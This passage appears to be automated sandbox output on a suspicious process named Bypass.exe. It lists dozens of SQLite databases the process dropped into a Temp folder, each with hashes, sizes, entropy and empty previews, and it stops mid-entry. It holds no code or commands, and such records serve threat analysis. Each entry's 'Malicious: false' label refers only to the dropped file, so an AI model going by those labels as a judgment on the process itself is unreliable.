SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dEdTfxWYqh

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dPnhAk1Epi

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dpHgQvJE5m

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\e9ApFk6jBH

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eVsv6epjTa

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eajk4J35Lf

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ec2ad5xz0N

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ezwsNj6hTv

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\f47IstJBJC

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fbAO6ovXhj

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fj6hZsZjjw

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\foRoDYx1iR

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\fq7PhAQCMm

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\g11SA8CJVQ

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gKGRaa0jlC

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\gSOigylxmi

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\giYLu2T0Hz

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hVQ4147Mmr

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\htFidZSIGt

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\hwENQHlSYC

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\i1O30rxsCL

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iQkY0Rp8Ba

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ihSJ8a1d1C

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ikYyC7rxDi

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jH7RGar9G8

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jupR2S8MUQ

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
